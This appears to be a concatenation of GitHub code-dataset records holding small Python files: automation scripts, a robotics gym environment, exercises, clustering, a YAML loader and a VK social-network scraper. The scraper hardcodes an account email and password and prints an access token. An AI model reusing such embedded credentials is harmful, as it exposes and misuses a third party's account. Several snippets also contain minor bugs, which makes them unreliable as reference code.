{quantidade:}\r\n\r\nAbs\r\nGabrielly Castro\"\"\"\r\n\r\npyperclip.copy(texto)\r\npyautogui.hotkey(\"ctrl\", \"v\")\r\ntime.sleep(2)\r\npyautogui.press(\"tab\")\r\npyautogui.press(\"enter\")\r\ntime.sleep(5)\r\npyautogui.click(x=1349, y=9)","repo_name":"Sterwinxs/Automacao-Phyton","sub_path":"email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74248176694","text":"import sys\nfrom datetime import datetime\nimport requests\n\n\nnow = datetime.now()\nsuccessMsg = \"Product: AdminPanel -- Installation completed successfully.\"\nnumberOfTimesToReadFile = 0\nsuccessMsgFound = False\n\nlogFile = open(\"C:\\\\tmp\\\\admin_panel_packge.log\", encoding='UTF-16LE')\nlines = logFile.readlines()\n\nfor line in lines:\n if successMsg in line:\n print(\"Success message FOUND!!\")\n successMsgFound = True\nlogFile.close()\n\n# if successMsgFound:\n# print(\"Found after reading file \" + str(numberOfTimesToReadFile) + \" times\")\n# break\n\nhtmFile = open(\"c:\\\\tmp\\\\reports\\\\report.html\",\"w\")\nhtmFile.write(\"\"\"<!DOCTYPE html>\n <html>\n <head>\n <style>\n table, th, td {\n border-style: solid;\n border-color: #2F4F4F;\n border-width: 1px;\n }\n </style>\n </head>\n <body>\n\n <h2>Test for Admin Panel</h2>\n\n\n <table style=\"width:50%\">\n <tr bgcolor = #5F9EA0>\n <th>Application</th>\n <th>Timestamp</th>\n <th>Status</th>\n </tr>\n <tr>\n <td bgcolor = #B0E0E6>Admin Panel</td> \n \"\"\")\n\nstring = \"This is just a test run at: \" + str(now)\n# Timestamp\nhtmFile.write(\"<td bgcolor = #B0E0E6>\" + str(now) + \"</td>\")\nresponse = None\ntry:\n response = requests.get(\"http://localhost/Admin/\")\n\nexcept error as e:\n print(e)\nfinally:\n print(\"Writing HTML Report\")\n if response:\n status = response.status_code\n print(\"Response: \" + str(response))\n # status\n if status == 200:\n htmFile.write(\"<td bgcolor = #00FA9A>Success</td>\")\n else:\n htmFile.write(\"<td bgcolor = #FFA07A>Fail</td>\")\n else:\n htmFile.write(\"<td bgcolor = #FFA07A>Fail</td>\")\n\nhtmFile.write(\"\"\"\n </tr>\n </table>\n\n </body>\n </html>\"\"\")\n\nhtmFile.close\n","repo_name":"kartikeyachauhan/test-repo-redmoon","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17809570412","text":"import numpy as np\nfrom gym import Env\nfrom gym.spaces import Box\nimport pybullet as p\nimport pybullet_data as pd\n\n\nclass WalkerEnv(Env):\n def __init__(self, render=False, max_reward=2000, ttl=1000):\n self.position = None\n self.max_reward = max_reward\n # time to live for our agent\n self.ttl = ttl\n\n if not render:\n method = p.GUI\n else:\n method = p.DIRECT\n\n # connect to the physics server, set our parameters and load models\n client_id = p.connect(method)\n p.setAdditionalSearchPath(pd.getDataPath())\n p.setGravity(0, 0, -9.8)\n\n # time needs a small adjustment\n p.setTimeStep(0.0001)\n plane_id = p.loadURDF('plane.urdf')\n self.start_position = [0, 0, -0.4]\n self.start_rotation = [0, 0, 0, 1]\n self.joints_angles = np.array([0 for _ in range(4)], dtype=np.float32)\n self.object_id = p.loadURDF('robot.urdf', self.start_position, self.start_rotation)\n\n self.n_joints = p.getNumJoints(self.object_id)\n\n joint_constraints = [[p.getJointInfo(self.object_id, idx)[8] for idx in range(self.n_joints)],\n [p.getJointInfo(self.object_id, idx)[9] for idx in range(self.n_joints)]]\n\n # this section will be refactored and corrected\n ###############################################\n\n # rotation values for each joint\n self.action_space = Box(low=np.array(joint_constraints[0]),\n high=np.array(joint_constraints[1]))\n\n # joint rotations, xyz position of body\n self.observation_space = Box(low=np.concatenate([joint_constraints[0], [-10, -10, 0]]),\n high=np.concatenate([joint_constraints[1], [10, 10, 1]]))\n\n self.multi_dof_joints = [idx for idx in range(self.n_joints) if p.getJointInfo(self.object_id, idx)[2] != 0]\n self.single_dof_joints = [idx for idx in range(self.n_joints) if p.getJointInfo(self.object_id, idx)[2] == 0]\n\n ###############################################\n\n def step(self, action=None):\n # apply action\n if action is not None:\n p.setJointMotorControlArray(self.object_id, [i for i in range(self.n_joints)], p.POSITION_CONTROL, action)\n p.stepSimulation()\n\n # generate observation\n multi_joints_or = np.array(\n [p.getJointStateMultiDof(self.object_id, idx)[0] for idx in self.multi_dof_joints]).flatten()\n rev_joints_or = np.array([p.getJointState(self.object_id, idx)[0] for idx in self.single_dof_joints])\n\n self.position = p.getBasePositionAndOrientation(self.object_id)[0]\n\n observation = np.concatenate([multi_joints_or, rev_joints_or, self.position], dtype=np.float32)\n\n # calculate reward\n # this will be changed to better suit our environment\n reward = -(self.position[0] ** 2) + (2 * self.position[1]) ** 2 - ((self.position[2] - 0.4) ** 2)\n if reward >= self.max_reward:\n done = True\n else:\n done = False\n\n # gym environment returns observation, reward, True if terminal state is reached and false instead, info about environment\n return observation, reward, done, {}\n\n def reset(self):\n p.removeBody(self.object_id)\n self.object_id = p.loadURDF('robot/walker.urdf', self.start_position, self.start_rotation)\n\n def close(self):\n p.disconnect()\n\n def render(self, mode=\"human\"):\n # we do nothing here because we pass render argument when creating an instance of environment\n pass\n","repo_name":"8bocian/SmallerProjects","sub_path":"RoboticsRelated/BipedalRobot/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42423153716","text":"\"\"\"\nGiven two integers a and b, return the sum of the two integers without using the operators + and -.\n\nnums and res in 32-bit int.\n\nExample 1:\n\nInput: a = 1, b = 2\nOutput: 3\nExample 2:\n\nInput: a = 2, b = 3\nOutput: 5\n\"\"\"\n\ndef getSum(a: int, b: int) -> int:\n # 32 bits integer max\n MAX = 0x7FFFFFFF\n # 32 bits interger min\n MIN = 0x80000000\n \n mask = 0xFFFFFFFF\n \n while b!=0: \n a, b = (a ^ b) & mask, ((a&b) << 1)&mask\n \n \n return a if a<= MAX else ~(a^mask) ","repo_name":"AlokPratapSingh22/Blind75","sub_path":"sumOfTwoNumbers.py","file_name":"sumOfTwoNumbers.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5715209279","text":"import time\nimport board\nimport busio\nimport adafruit_ads1x15.ads1115 as ADS\nimport RPi.GPIO as GPIO\nfrom adafruit_ads1x15.analog_in import AnalogIn\nSensor = 0.0 #Variable para obtener valor de sensado por ultrasonido US016\nGPIO.setmode(GPIO.BCM) \nGPIO.setup(12,GPIO.OUT)\npwm12=GPIO.PWM(12,490) #GPIO 12 configurado en modo PWM con frecuencia de 490Hz (Motobomba tanque principal)\npwm12.start(0)\nGPIO.setup(13,GPIO.OUT)\npwm13=GPIO.PWM(13,490) #GPIO 12 configurado en modo PWM con frecuencia de 490Hz (Motobomba tanque auxiliar)\npwm13.start(0)\ni2c = busio.I2C(board.SCL, board.SDA) #Configuracion de ADC ADS1115\nads = ADS.ADS1115(i2c)\nchan = AnalogIn(ads, ADS.P0)\nwhile True:\n Sensor = round(chan.voltage,3) #Lectura de valor de voltaje con acondicionamiento de sensor\n if (Sensor <=0.006): #Si valor de sensor menor a 0.0006 detener motobomba de vaciado\n pwm13.ChangeDutyCycle(0)\n pwm12.ChangeDutyCycle(0)\n else: \n pwm13.ChangeDutyCycle(100) #Si valor de sensor mayor a 0.0006 activar motobomba de vaciado\n pwm12.ChangeDutyCycle(0)\n ","repo_name":"Uniminutoarduino/SmartLabsUniminuto-GOLC","sub_path":"ControlSystems/Codetoemptytank.py","file_name":"Codetoemptytank.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5631585336","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n lst = list(map(int, input().split()))\n sum_num = 0\n for i in lst:\n sum_num += i\n sum_avg = round(sum_num/10)\n\n print(f'#{tc} {sum_avg}')","repo_name":"Haru-arp/TIL","sub_path":"Algorithm/SWEA/2071_평균값 구하기/2071_평균값 구하기.py","file_name":"2071_평균값 구하기.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8449769304","text":"from django.shortcuts import render\nfrom plotly.offline import plot\nimport plotly.graph_objects as go\n# Create your views here.\nimport datetime\nimport numpy as np\n\n\ndef home(request):\n def scatter():\n np.random.seed(1)\n\n programmers = ['Alex','Nicole','Sara','Etienne','Chelsea','Jody','Marianne']\n\n base = datetime.datetime.today()\n dates = base - np.arange(180) * datetime.timedelta(days=1)\n z = np.random.poisson(size=(len(programmers), len(dates)))\n\n fig = go.Figure(data=go.Heatmap(\n z=z,\n x=dates,\n y=programmers,\n colorscale='Viridis'))\n\n fig.update_layout(\n title='GitHub commits per day',\n xaxis_nticks=36)\n\n plot_div = plot(fig, output_type='div', include_plotlyjs=False)\n return plot_div\n\n context ={\n 'plot1': scatter()\n }\n\n return render(request, 'home/welcome.html', context)","repo_name":"MattiaCarolo/django-dash","sub_path":"zzz/plsite/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2325077596","text":"# Integer checker - more advanced\ndef calculate():\n valid = False\n while not valid:\n try:\n num = float(input(\"Enter participant's time: \"))\n if isinstance(num, float):\n valid = True\n return num\n except ValueError:\n print(\"That is not a number\")\n\n\ntime = calculate()\nprint(f\"The test number is {time}\")\n\n\n# Check for valid string input - eg name\ndef string_checker(question):\n error = \"Can't be a number or blank\\n\"\n while True:\n to_test = input(question)\n if not to_test.isalpha():\n print(error)\n continue\n else:\n return to_test\n\n\nname = string_checker(\"Please enter participant name: \")\n","repo_name":"amobiless/Assessment","sub_path":"04_number_checker_v2.py","file_name":"04_number_checker_v2.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29630237331","text":"import numpy as np\n\nclass KMeans_Self:\n def __init__(self,K, iters=10):\n self.K = K\n self.iters = iters\n\n def createCenter(self,data):\n centers = []\n maxRange = np.max(data,axis=1)\n for _ in range(self.K):\n x = np.random.uniform(low=0,high=maxRange[0],size=1)\n y = np.random.uniform(low=0,high=maxRange[1],size=1)\n centers.append([int(x),int(y)])\n return np.array(centers)\n\n def distance(self,centers,data):\n res = np.zeros([data.shape[0],self.K])\n for i in range(self.K):\n res[:,i] = np.sqrt((centers[i,0]-data[:,0])**2+(centers[i,1]-data[:,1])**2)\n return res\n\n def getRnk(self,dis): \n for i in range(dis.shape[0]):\n dis[i] = dis[i] / np.max(dis[i])\n\n dis[dis<1] = 0\n return dis\n \n def updateCenters(self,rnk,data): \n centers = []\n for i in range(self.K):\n r = rnk[:,i]\n # print(r.shape,data.shape)\n x = np.sum(data[:,0] * r) / np.sum(r)\n y = np.sum(data[:,1] * r) / np.sum(r)\n centers.append([int(x),int(y)])\n return np.array(centers)\n\n def lossCalculate(self,rnk,centers,data):\n loss = 0\n for i in range(self.K):\n cx = rnk[:,i] * centers[i,0]\n cy = rnk[:,i] * centers[i,1]\n loss +=np.sum(np.sqrt((cx-data[:,0])**2+(cy-data[:,1])**2)) \n\n return loss\n\n def getLabel(self,rnk):\n l = np.zeros([rnk.shape[0]])\n for i in range(rnk.shape[0]):\n l[i] = np.where(rnk[i] == 1)[0][0]\n # print(l)\n return l\n\n\n def fit(self,data):\n centers = self.createCenter(data) \n iters = 0\n while self.iters > iters:\n iters += 1\n dis = self.distance(centers,data)\n rnk = self.getRnk(dis)\n centers = self.updateCenters(rnk,data)\n # loss = self.lossCalculate(rnk,centers,data)\n # print(loss)\n # print(centers)\n label = self.getLabel(rnk)\n return label","repo_name":"skye789/PA","sub_path":"B_ Exercise Worksheets a Material/code_hu/EX4/KMEANS.py","file_name":"KMEANS.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9331588963","text":"__author__ = 'ramvibhakar'\n#https://www.hackerrank.com/contests/pythonist/challenges/python-string-formatting\n\nN = int(input())\nspace = len(bin(N)[2:]) + 1\nfor i in xrange(1, N+1):\n d = str(i)\n o = str(oct(i)[1:])\n h = str(hex(i)[2:]).upper()\n b = str(bin(i)[2:])\n print(' '*(space-len(d)-1)+d+' '*(space-len(o))+o+' '*(space-len(h))+h+' '*(space-len(b))+b)","repo_name":"ramvibhakar/hacker_rank","sub_path":"Algorithms/Contests/Pythonist/string_formatting.py","file_name":"string_formatting.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24796630212","text":"import os\nimport typing\nfrom pathlib import Path\nimport pkg_resources\nimport semantic_version\nimport shutil\nimport subprocess\nfrom typing import Union, List\n\nimport et_micc2.tools.messages as messages\n\nPYBIND11_MINIMAL_VERSION = '2.6.2'\n\n\ndef on_vsc_cluster():\n \"\"\"test if we are running on one of the VSC clusters\"\"\"\n try:\n os.environ['VSC_HOME']\n os.environ['VSC_INSTITUTE_CLUSTER']\n except:\n return False\n else:\n return True\n\n\ndef is_os_tool(path_to_exe):\n \"\"\"test if path_to_exe was installed as part of the OS.\"\"\"\n return path_to_exe.startswith('/usr/bin')\n\n\nclass PkgInfo:\n mock = [] # list of module names to pretend missing. This is just for testing purposes.\n\n def __init__(self, pkg_name):\n if pkg_name in PkgInfo.mock:\n print(f'Mock: pretending module `{pkg_name}` is missing.')\n self.which = ''\n else:\n try:\n self.pkg_dist_info = pkg_resources.get_distribution(pkg_name)\n except pkg_resources.DistributionNotFound:\n self.which = ''\n else:\n self.which = self.pkg_dist_info.location\n\n def is_available(self):\n \"\"\"Return True if the tool is available, False otherwise.\"\"\"\n return bool(self.which)\n\n def version(self):\n \"\"\"Return the version string of the tool, or an empty string if the tool is not available.\"\"\"\n return self.pkg_dist_info.version if self.which else ''\n\n\nclass ToolInfo:\n mock = [] # list of executable names to pretend missing. This is just fortesting purposes.\n\n def __init__(self, exe, accept_cluster_os_tools=False):\n \"\"\"Check if tool 'exe' is available.\n\n :param str exe: name of an executable\n :param bool accept_cluster_os_tools: accept cluster operating system tools\n\n\n :return: SimpleNamespace(which,version), where which is the location of the tool or an empty\n string if it is not found or not accepted, and version is the version string (if requested)\n as returned be 'exe --version'.\n \"\"\"\n self.exe = exe\n if exe in ToolInfo.mock:\n print(f'Mock: pretending tool `{exe}` is missing.')\n self.which = ''\n else:\n # completed_which = subprocess.run(['which', exe], capture_output=True, text=True)\n # self.which = completed_which.stdout.strip().replace('\\n', ' ')\n self.which = shutil.which(exe)\n\n if self.which:\n if on_vsc_cluster() and not accept_cluster_os_tools and is_os_tool(self.which):\n self.which = ''\n\n def is_available(self):\n \"\"\"Return True if the tool is available, False otherwise.\"\"\"\n return bool(self.which)\n\n def version(self):\n \"\"\"Return the version string of the tool, or an empty string if the tool is not available.\"\"\"\n if self.which:\n completed_version = subprocess.run([self.exe, '--version'], capture_output=True, text=True)\n self.version = completed_version.stdout.strip().replace('\\n\\n','\\n')#.replace('\\n','\\n ')\n else:\n self.version = ''\n return self.version\n\n\ndef verify_project_name(project_name):\n \"\"\"Project names must start with a char, and contain only chars, digits, underscores and dashes.\n\n :returns: bool\n \"\"\"\n p = re.compile(r\"\\A[a-zA-Z][a-zA-Z0-9_-]*\\Z\")\n return bool(p.match(project_name))\n\n\ndef check_pybind11(required=False):\n pybind11 = PkgInfo('pybind11')\n is_available = pybind11.is_available()\n if not is_available:\n msg = (\n 'Pybind11 is missing. C++ binary extension modules can be added, but `Pybind11` must\\n'\n 'be availaible to build them. \\n'\n ' - run `pip install pybind11 [--user]``\\n'\n )\n if required:\n messages.error(msg, ExitCodes.MISSING_COMPONENT)\n else:\n messages.warning(msg)\n else:\n if semantic_version.Version(pybind11.version()) < semantic_version.Version(PYBIND11_MINIMAL_VERSION):\n messages.warning(\n f'The pybind11 version in your environment is v{pybind11.version()}, '\n f'which is older than v{PYBIND11_MINIMAL_VERSION}.\\n'\n f'This may cause problems. Upgrading is recommended.'\n f' - run `pip install pybind11 [--user] --upgrade`\\n'\n )\n\n\ndef check_f2py(required=False):\n if not ToolInfo('f2py').is_available():\n msg = (\n 'F2py is missing. Fortran binary extension modules can be added, but `f2py` must\\n'\n 'be availaible to build them. F2py is part of the `numpy` Python package.\\n'\n ' - on the cluster load a module that exposes `numpy`\\n'\n ' - elsewhere `pip install numpy [--user]`'\n )\n if required:\n messages.error(msg, ExitCodes.MISSING_COMPONENT)\n else:\n messages.warning(msg)\n\n\ndef check_cmake(required=False):\n if not ToolInfo('cmake').is_available():\n msg = (\n 'CMake is missing. C++ binary extension modules can be added, but `cmake` must\\n'\n 'be available to build them.'\n ' - on UAntwerpen clusters: `module load buildtools`\\n'\n ' - on other VSC clusters: `module load CMake`\\n'\n ' - elsewhere: `pip install cmake [--user]`, or install from https://cmake.org'\n )\n if required:\n messages.error(msg, messages.ExitCodes.MISSING_COMPONENT)\n else:\n messages.warning(msg)\n\ndef list_folders_in(_path: Path) -> typing.List[str]:\n \"\"\"Get a list of all subfolders of dir_path.\"\"\"\n lines = []\n for entry in dir_path.iterdir():\n if entry.is_dir():\n lines.append(str(entry))\n return lines\n\ndef common_path(\n paths: List[Union[Path,str]],\n ) -> Path:\n \"\"\"Return the common directory (from root to leaf).\n\n Params:\n paths: list of paths from which the common path (left to right) is extracted.\n \"\"\"\n paths_resolved = [str(Path(p).resolve()) for p in paths]\n p = Path(os.path.commonpath(paths_resolved))\n return p","repo_name":"etijskens/et-micc2","sub_path":"et_micc2/tools/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41984309985","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport urllib\nimport json\nfrom time import sleep\nfrom datetime import datetime, timedelta\nimport sys\nimport csv\nimport os\nimport vk_auth\n\napp_id = '5406915'\naccess_token = vk_auth.auth('vktool@mail.ru', 'vkpassvk', app_id, 'offline')[0]\nprint (access_token)\n\ndef get_json(url):\n\tgetjson = urllib.request.urlopen(url).readall().decode('utf-8')\n\tgetjson = json.loads(getjson)\n\tsleep(0.3)\n\treturn getjson\n\npublics_list = open('../../config/config.json').read()\npublics_list = json.loads(publics_list)\n\nlogs_folder = '../../logs/' + publics_list['fail_checker_logs_folder'][0]\nlogs = os.listdir(logs_folder)\n\ncount_fails = 0\nfailed_corrections = 0\n\nfor log in logs:\n\tcurr_log = open('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/' + log)\n\tcurr_log_reader = csv.reader(curr_log)\n\tresult_before = open('../../results/csv/' + log[4:], 'r')\n\tresult_before_reader = csv.reader(result_before)\n\n\tresult_after = open(('../../results/csv/' + log[4:]).replace('.csv', '_tmp.csv'), 'w')\n\tresult_after_writer = csv.writer(result_after)\n\n\tlogs_after = open('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/tmp_' + log, 'w')\n\tlogs_after_writer = csv.writer(logs_after)\n\tlogs_after_writer.writerows([['type', 'uid']])\n\n\n\tnext(curr_log_reader)\n\n\tfailed_users = {}\n\tfor row in curr_log_reader:\n\t\tfailed_users[row[1]] = []\n\tcurr_log.seek(0)\n\tnext(curr_log_reader)\n\tfor row in curr_log_reader:\n\t\tcount_fails += 1\n\t\tfailed_users[row[1]].append(row[0])\n\n\tfor row in result_before_reader:\n\t\tif (row[1] not in failed_users):\n\t\t\tresult_after_writer.writerows([[row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13],row[14],row[15]]])\n\t\telse:\n\t\t\tprint ('Checking id' + row[1])\n\t\t\tcity = row[7]\n\t\t\tcount_original = row[9]\n\t\t\tcount_reposts = row[10]\n\t\t\tcount_likes = row[11]\n\t\t\tcount_comments = row[12]\n\t\t\tcount_unique_reposts = row[13]\n\t\t\tcount_friends = row[14]\n\t\t\tcount_followers = row[15]\n\n\t\t\tif ('city' in failed_users[row[1]]):\n\t\t\t\turl = 'https://api.vk.com/method/users.get?fields=city&user_ids=' + row[1] + '&access_token=' + access_token\n\t\t\t\ttry:\n\t\t\t\t\tuser_info = get_json(url)\n\t\t\t\texcept:\n\t\t\t\t\tprint ('Failed getting city__' + str(row[1]))\n\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\tlogs_after_writer .writerows([['city', str(member['uid'])]])\n\t\t\t\tif ('response' in user_info):\n\t\t\t\t\tcity_code = user_info['response'][0]['city']\n\t\t\t\t\tcity_info = 'https://api.vk.com/method/database.getCitiesById?access_token=' + access_token + '&city_ids=' + str(city_code)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcity_info = get_json(city_info)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\t\tprint ('failed getting city__' + str(row[1]))\n\t\t\t\t\t\tlogs_after_writer.writerows([['city', str(row[1])]])\n\t\t\t\t\tif 'response' in city_info:\n\t\t\t\t\t\tcity = city_info['response'][0]['name']\n\n\t\t\tif ('wall' in failed_users[row[1]]):\n\t\t\t\tcurr_time = datetime.now()\n\t\t\t\tdate_diff = timedelta(1)\n\t\t\t\twall_offset = 0\n\t\t\t\twall_count = 101\n\t\t\t\tcount_original = 0\n\t\t\t\tcount_reposts = 0\n\t\t\t\tcount_likes = 0\n\t\t\t\tcount_comments = 0\n\t\t\t\tcount_unique_reposts = 0\n\t\t\t\twhile (wall_offset < wall_count and date_diff.days < 366):\n\t\t\t\t\twall = 'https://api.vk.com/method/wall.get?access_token=' + access_token + '&filter=owner&offset=' + str(wall_offset) + '&count=100&owner_id=' + str(row[1])\n\t\t\t\t\ttry:\n\t\t\t\t\t\twall = get_json(wall)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint ('failed getting wall__' + str(row[1]))\n\t\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\t\tlogs_after_writer.writerows([['wall', str(row[1])]])\n\t\t\t\t\tif 'response' in wall:\n\t\t\t\t\t\twall_count = wall['response'][0]\n\t\t\t\t\t\tdel wall['response'][0]\n\t\t\t\t\t\tfor post in wall['response']:\n\t\t\t\t\t\t\tpost_date = datetime.fromtimestamp(post['date'])\n\t\t\t\t\t\t\tdate_diff = curr_time - post_date\n\t\t\t\t\t\t\tif date_diff.days < 366:\n\t\t\t\t\t\t\t\tcount_likes += post['likes']['count']\n\t\t\t\t\t\t\t\tcount_comments += post['comments']['count']\n\t\t\t\t\t\t\t\tif post['post_type'] == 'post':\n\t\t\t\t\t\t\t\t\tcount_original +=1\n\t\t\t\t\t\t\t\t\tcount_unique_reposts += post['reposts']['count']\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcount_reposts += 1\n\n\t\t\t\t\t\twall_offset += 100\n\t\t\t\t\telse:\n\t\t\t\t\t\twall_count = 0\n\n\t\t\tif ('friends' in failed_users[row[1]]):\n\t\t\t\tcount_friends = 0\n\t\t\t\tfriends_url = 'https://api.vk.com/method/friends.get?access_token=' + access_token + '&fields=name&user_id=' + str(row[1])\n\t\t\t\ttry:\n\t\t\t\t\tfriends = get_json(friends_url)\n\t\t\t\texcept:\n\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\tprint ('failed getting friends__' + str(row[1]))\n\t\t\t\t\tlogs_after_writer.writerows([['friends', str(row[1])]])\n\t\t\t\tif ('response' in friends):\n\t\t\t\t\tcount_friends = len(friends['response'])\n\t\t\t\t\tif (count_friends == 5000):\n\t\t\t\t\t\tfriends_url = 'https://api.vk.com/method/friends.get?offset=5000&access_token=' + access_token + '&fields=name&user_id=' + str(row[1])\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfriends = get_json(friends_url)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\t\t\tprint ('failed grtting friends__' + str(row[1]))\n\t\t\t\t\t\t\tlogs_after_writer.writerows([['friends', str(row[1])]])\n\t\t\t\t\t\tif ('response' in friends):\n\t\t\t\t\t\t\tcount_friends += len(friends['response'])\n\n\t\t\tif ('followers' in failed_users[row[1]]):\n\t\t\t\tcount_followers = 0\n\t\t\t\tfollowers_url = 'https://api.vk.com/method/users.getFollowers?access_token=' + access_token + '&count=0&user_id=' + str(row[1])\n\t\t\t\ttry:\n\t\t\t\t\tfollowers = get_json(followers_url)\n\t\t\t\texcept:\n\t\t\t\t\tfailed_corrections += 1\n\t\t\t\t\tlogs_after_writer.writerows([['followers', str(row[1])]])\n\t\t\t\t\tprint ('failed getting followers__' + str(row[1]))\n\t\t\t\tif ('response' in followers):\n\t\t\t\t\tcount_followers = followers['response']['count']\n\n\t\t\tresult_after_writer.writerows([[row[0],row[1],row[2],row[3],row[4],row[5],row[6],city,row[8],count_original,count_reposts,count_likes,count_comments,count_unique_reposts,count_friends,count_followers]])\n \n\ncurr_log.close()\nresult_before.close()\nresult_after.close()\nlogs_after.close()\n\nfor log in logs:\n\tos.remove('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/' + log)\n\tos.rename('../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/tmp_' + log, '../../logs/' + publics_list['fail_checker_logs_folder'][0] + '/' + log)\n\n\tos.remove('../../results/csv/' + log[4:])\n\tos.rename(('../../results/csv/' + log[4:]).replace('.csv', '_tmp.csv'), '../../results/csv/' + log[4:])\n\nprint ('Completed. ' + str(count_fails - failed_corrections) + ' errors out of ' + str(count_fails) + ' were corrected') ","repo_name":"ryavorsky/7maps","sub_path":"scripts/fail_checkers/members_info_fail_checker.py","file_name":"members_info_fail_checker.py","file_ext":"py","file_size_in_byte":6367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73789635891","text":"import os,yaml\n\nclass RepositoryConfig(object):\n def __init__(self, repository=None,path=None,value=None,debug_path=None):\n pass\n\nclass YamlConfig(object):\n def __init__(self,filename=None,path=None,value=None,debug_path=None):\n if debug_path:\n self.debug_path = debug_path\n else:\n self.debug_path = ''\n if filename:\n stream = open(filename,'r',encoding='utf-8')\n self.yaml = yaml.safe_load(stream)\n stream.close()\n if path:\n self.path = path\n else:\n self.path = os.path.dirname(filename)\n elif path:\n self.path = path\n filename = self._filename(path)\n if filename:\n stream = open(filename,'r',encoding='utf-8')\n self.yaml = yaml.safe_load(stream)\n stream.close()\n elif os.path.isdir(self.path):\n self.yaml = {}\n else:\n raise Exception('path is not found:\"%s\"' % path)\n else:\n if not isinstance(value,dict):\n raise Exception('value must be dict type')\n self.path = None\n self.yaml = value\n def __getattr__(self, name):\n if self.yaml.has_key(name):\n value = self.yaml.get(name)\n if isinstance(value,dict):\n value = YamlConfig(value=value,debug_path=self.debug_path+name)\n self.yaml[name] = value\n else:\n if not self.path:\n raise AttributeError('proparty %s is not exist in dict on \"%s\"' % (name,self.debug_path))\n path = self.path + '/' + name\n filename = self._filename(path)\n if not os.path.isdir(path) and not filename:\n raise AttributeError('proparty %s is not exist on path \"%s\".' % (name,path))\n value = YamlConfig(path=path,debug_path=self.debug_path+name)\n self.yaml[name] = value\n return value\n def _filename(self,path):\n filename = path + '.yml'\n if not os.path.isfile(filename):\n filename = path + '.yaml'\n if not os.path.isfile(filename):\n filename = None\n return filename\n\nclass YamlLoader(object):\n def __init__(self,target=None,cache=None,timeout=300):\n self.target = target\n self.cache = cache\n self.timeout = timeout\n self.cache_key_prefix=self.__module__ + type(self).__name__\n\n def load(self,target=None):\n if target==None:\n target = self.target\n if self.cache:\n key = self.cache_key_prefix + target\n value = self.cache.get(key)\n if value is not None:\n return value\n value = self._loadfiles(target)\n if self.cache:\n self.cache.add(key, value, self.timeout)\n return value\n\n def file2dict(self,filename):\n stream = open( filename,'r',encoding='utf-8')\n config = yaml.safe_load(stream)\n stream.close()\n return config\n\n def _loadfiles(self,target):\n config = {}\n passfile = None\n if os.path.isfile(target):\n config = self.file2dict(target)\n passfile = os.path.basename(target)\n target = os.path.dirname(target)\n for filename in os.listdir(target):\n if filename == passfile:\n continue\n fullpath = os.path.join(target, filename)\n if os.path.isfile(fullpath):\n name,ext = os.path.splitext(filename)\n if ext == '.yml' or ext == '.yaml':\n config[name] = self.file2dict(fullpath)\n elif os.path.isdir(fullpath):\n config[filename] = self._loadfiles(fullpath)\n return config\n\nclass CollectionProxy(object):\n def __init__(self,entity):\n self._entity = entity\n def __getattr__(self,name):\n if name=='name':\n return self._entity['name']\n return self._entity['config'].get(name)\n def dumpConfig(self):\n return DictToYaml(self._entity.config)\n def clear(self):\n self._entity = None\n #if isinstance(config,unicode):\n # raise Exception('unicode')\n #if isinstance(config,str):\n # raise Exception('str')\n\nclass DocumentProxy(object):\n def __init__(self,entity,documentManager,routeManager):\n self._entity = entity\n self._collection = 'unsolved'\n self._documentManager = documentManager\n self._routeManager = routeManager\n self.url = None\n def __getattr__(self,name):\n if name=='name':\n return self._entity['name']\n elif name=='content':\n return self._entity['content']\n elif name=='date':\n return self._entity['date']\n\n return self._entity['headers'].get(name)\n def dumpHeaders(self):\n return DictToYaml(self._entity.headers)\n @property\n def collection(self):\n \"\"\"Get collection entity\"\"\"\n if self._collection == 'unsolved':\n self._collection = 